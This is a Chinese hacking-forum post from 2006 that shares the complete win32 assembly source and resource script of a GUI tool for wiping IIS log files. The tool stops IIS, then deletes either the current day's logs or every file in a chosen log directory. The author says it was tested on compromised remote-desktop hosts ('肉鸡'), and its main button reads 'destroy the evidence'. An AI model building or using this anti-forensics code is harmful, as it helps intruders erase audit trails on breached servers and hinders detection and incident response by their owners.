[原创]系统日志删除工具(win32asm开源工具)
文章作者:ASM信息来源:邪恶八进制信息安全团队([url]http://www.eviloctal.com/[/url])
[color=red]注:本篇文章首发于红狼安全小组,今由作者转发到邪恶八进制[/color]
写这个工具的目的:借助编写代码来探索未知和巩固自己所学........
把源码发出来,估计刚学win32汇编的人能看得着 :)
如果代码写得倒了你的胃口,那我真是不好意思,哈
图片:
[attach]9831[/attach]
完整代码:
[code]
;******************************************************
;程序编写by Asm
;日期:2006-12-11日凌晨
;出处:[url]http://www.wolfexp.net/[/url](红狼安全小组)
;注意事项:如欲转载,请保持本程序的完整,并注明:
;转载自 红狼安全小组([url]http://www.wolfexp.net/[/url])
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include shell32.inc
includelib shell32.lib
ICO_MAIN equ 1000
DLG_MAIN equ 1000
IDC_Open equ 1001
IDC_RiZhi equ 1002
IDC_stop equ 1003
IDC_Del equ 1004
IDC_WeiZhao equ 1005
IDC_start equ 1006
IDC_Out equ 1007
IDC_About equ 1008
IDC_Wolf equ 1009
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hwnd dd ?
hInstance dd ?
.data
bbf db 256 dup(0)
FileName db 256 dup(0)
FileNamePattern db 156 dup(0)
binfo BROWSEINFO <>
szFile db '\*.log',0
szXie db '\',0
szBuffer db 256 dup(?)
lpCreationTime FILETIME <?>
szStopIIs db 'iisreset -stop',0
stStartUp STARTUPINFO <?>
stProcInfo PROCESS_INFORMATION <?>
lpSystemTime SYSTEMTIME <?>
szWeiZhao db 256 dup(?)
szFile1 db '\*.*',0
delallfile db 156 dup(0)
allfile db 256 dup (0)
szStartIIs db 'iisreset -start',0
szTitle db '关于工具的一点说明',0
szCaption db '在删除日志之前请先停止IIS服务 :)',0ah
db '此工具的编写是一次练习,只是为了借助编写代码来探索未知和巩固自己所学',0ah
db '我在3389肉鸡上测试通过,但愿你使用的时候不要倒了你的胃口 :) ',0ah
db '如果你有什么好办法,请到红狼安全小组找我交流,我很荣幸',0ah
db 'By Asm 红狼安全小组 [C.R.S.T]',0ah
db '[url]http://www.wolfexp.net/[/url]',0ah,0
szWolf db '[url]http://www.wolfexp.net/[/url]',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;打开目录对话框
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetOpenDirectoryName proc
pushad ;寄存器全部压栈
invoke RtlZeroMemory,addr binfo,sizeof binfo
mov binfo.ulFlags,BIF_RETURNFSANCESTORS or BIF_RETURNONLYFSDIRS
invoke SHBrowseForFolder,addr binfo
invoke SHGetPathFromIDList,eax,addr bbf
popad ;释放所有寄存器
ret
_GetOpenDirectoryName endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;删除日志
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DeleteFile proc uses edi
LOCAL finddata:WIN32_FIND_DATA
LOCAL hFindFile:DWORD
LOCAL hWnd:DWORD
invoke lstrcat,addr FileNamePattern,addr bbf ;FileNamePattern=C:\windows\system32\logfile
invoke lstrcat,addr FileNamePattern,addr szFile ;FileNamePattern=C:\windows\system32\logfile\*.log
invoke FindFirstFile,addr FileNamePattern,addr finddata ;查找log文件
.if eax!=INVALID_HANDLE_VALUE
mov hFindFile,eax
.repeat
invoke RtlZeroMemory,addr FileName,sizeof FileName
invoke lstrcat,addr FileName,addr bbf ;FileName=C:\windows\system32\logfile
invoke lstrcat,addr FileName,addr szXie ;FileName=C:\windows\system32\logfile\
lea eax,finddata.cFileName ;eax=找到的文件名
invoke lstrcat,addr FileName,eax ;FileName=完整的文件名
call _GetFileTime ;调用子程序
invoke FindNextFile,hFindFile,addr finddata
.until eax == FALSE
invoke FindClose,hFindFile
.endif
ret
_DeleteFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_GetFileTime proc
local @hFile:DWORD
local @stUTC:SYSTEMTIME
invoke CreateFile,addr FileName,\ ;打开文件
GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax != INVALID_HANDLE_VALUE ;成功吗?
mov @hFile,eax ;成功了就保存句柄
invoke GetFileTime,@hFile,addr lpCreationTime,NULL,NULL ;获取日志文件的时间
invoke FileTimeToSystemTime,addr lpCreationTime,addr @stUTC ;扩展到系统时间
.if eax != NULL ;成功吗?
movzx ecx,@stUTC.wDay ;成功了就扩展日期到32位
.if ecx == ebx ;ecx=文件的创建日期,如果ecx等于当前系统的时间
invoke CloseHandle,@hFile ;先关闭文件
invoke DeleteFile,addr FileName ;才删除日志
.endif
.endif
.endif
ret
_GetFileTime endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_stopIIS proc
invoke GetStartupInfo,addr stStartUp
invoke CreateProcess,NULL,addr szStopIIs,NULL,NULL,NULL,\
NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
ret
_stopIIS endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_startIIS proc
invoke GetStartupInfo,addr stStartUp
invoke CreateProcess,NULL,addr szStartIIs,NULL,NULL,NULL,\
NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,addr stProcInfo
ret
_startIIS endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DeleteAllFile proc uses edi
LOCAL finddata:WIN32_FIND_DATA
LOCAL hFindFile:DWORD
LOCAL hWnd:DWORD
invoke lstrcat,addr delallfile,addr bbf
invoke lstrcat,addr delallfile,addr szFile1
invoke FindFirstFile,addr delallfile,addr finddata
.if eax!=INVALID_HANDLE_VALUE
mov hFindFile,eax
.repeat
invoke RtlZeroMemory,addr allfile,sizeof allfile
invoke lstrcat,addr allfile,addr bbf
invoke lstrcat,addr allfile,addr szXie
lea eax,finddata.cFileName
invoke lstrcat,addr allfile,eax
invoke DeleteFile,addr allfile
invoke FindNextFile,hFindFile,addr finddata
.until eax == FALSE
invoke FindClose,hFindFile
.endif
ret
_DeleteAllFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
;主程序代码从这里开始
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd,NULL
.elseif eax == WM_INITDIALOG
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
.elseif eax == WM_COMMAND
mov eax,wParam
.if eax == IDC_Open
call _GetOpenDirectoryName
invoke SetDlgItemText,hWnd,IDC_RiZhi,addr bbf
invoke GetDlgItemText,hWnd,IDC_RiZhi,addr bbf,sizeof bbf
.elseif eax == IDC_stop
call _stopIIS
.elseif (eax == IDC_Del)||(eax == IDOK)
invoke GetSystemTime,addr lpSystemTime ;获取系统时间
xor ebx,ebx ;为了防止ebx有其他值,先清空
movzx ebx,lpSystemTime.wDay ;扩展32位保存今天的日期
call _DeleteFile
.elseif (eax == IDC_WeiZhao)||(eax == IDOK)
call _DeleteAllFile
.elseif eax == IDC_start
call _startIIS
.elseif eax == IDC_Out
invoke ExitProcess,eax
.elseif eax == IDC_About
invoke MessageBox,NULL,addr szCaption,addr szTitle,MB_OK
.elseif eax == IDC_Wolf
invoke ShellExecute,0,0,addr szWolf,0,0,SW_SHOW
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret
_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start
[/code]
[code]
RC资源脚本 :
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#include <resource.h>
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
#define ICO_MAIN 1000 //图标
#define DLG_MAIN 1000
#define IDC_Open 1001
#define IDC_RiZhi 1002
#define IDC_stop 1003
#define IDC_Del 1004
#define IDC_WeiZhao 1005
#define IDC_start 1006
#define IDC_Out 1007
#define IDC_About 1008
#define IDC_Wolf 1009
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN ICON "test.ico"
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
DLG_MAIN DIALOG 0, 0, 250, 116
STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
CAPTION "日志删除工具 By Asm 红狼安全小组[C.R.S.T] "
FONT 9, "宋体"
STYLE 0x14CA0000
EXSTYLE 0x00000001
{
GROUPBOX "删除选项", -1,13,10,224,85
LTEXT "填写日志目录:", -1,16,33,54,15
EDITTEXT IDC_RiZhi, 71,32,88,14, ES_AUTOHSCROLL | WS_BORDER | WS_TABSTOP
LTEXT "删除当天日志:", -1,19,50,53,8
AUTOCHECKBOX "" IDC_Del,74,51,9,9
LTEXT "删除全部日志:", -1,84,50,53,8
AUTOCHECKBOX "" IDC_WeiZhao,139,50,9,9
PUSHBUTTON "开始 ""毁尸灭迹""",IDOK,160,70,72,15
PUSHBUTTON "浏览",IDC_Open,162,32,23,15
PUSHBUTTON "暂停IIS服务",IDC_stop,188,32,44,15
PUSHBUTTON "恢复IIS服务",IDC_start,188,50,45,15
PUSHBUTTON "退出",IDC_Out,120,70,38,14
PUSHBUTTON "关于程序",IDC_About,80,70,38,15
PUSHBUTTON "红狼安全小组",IDC_Wolf,19,70,60,15
}
//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>[/code]
页:
[1]